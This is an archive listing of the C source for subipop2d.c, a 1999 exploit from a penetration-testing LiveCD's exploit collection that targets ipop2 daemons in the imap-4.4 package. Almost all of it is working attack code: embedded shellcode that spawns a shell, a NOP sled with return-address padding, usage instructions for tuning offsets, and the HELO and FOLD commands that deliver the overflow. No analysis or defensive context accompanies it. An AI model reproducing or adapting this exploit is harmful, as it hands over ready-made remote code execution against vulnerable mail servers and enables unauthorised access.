Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / pop2 / subipopd.c < prev

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 68 lines

/* * subipop2d.c (c) 1999 Subterrain Security * * Written by bind - June 18, 1999 * * Vulnerable: ipop2 daemons shipped with the imap-4.4 package * Compromise: remote users can spawn a shell as user "nobody * * Greets: vacuum, xdr & cripto... * * Usage: * ./subipop2 <auth> <user> <pass> [offset] [alignment] [timeout] * * Try offsets -500...500, alignment option should be between 0 and 3 * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define RET 0xbffff718 #define NOP 0x90 #define WAIT 20 char shellcode[] = /* shellcode "borrowed" from plaguez's imapx.c */ "\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80" "\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07" "\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f" "\x42\x49\x4e\x2f\x53\x48\x00"; int main (int argc, char **argv) { char buf[1002], *auth, *user, *pass; int i, offset = 0, align = 0, timeout = WAIT; unsigned long addr; if (argc < 4) { printf ("usage: %s <auth> <user> <password> [offset] [alignment]" " [timeout]\n", argv[0]); exit (1); } auth = argv[1]; user = argv[2]; pass = argv[3]; if (argc > 4) offset = atoi (argv[4]); if (argc > 5) align = atoi (argv[5]); if (argc > 6) timeout = atoi (argv[6]); addr = RET - offset; memset (buf, NOP, 1002); memcpy (buf + 500, shellcode, strlen (shellcode)); for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4) *(long *) &buf[i] = addr; sleep (2); printf ("HELO %s:%s %s\n", auth, user, pass); sleep (timeout); printf ("FOLD %s\n", buf); } /* www.hack.co.za [2000]*/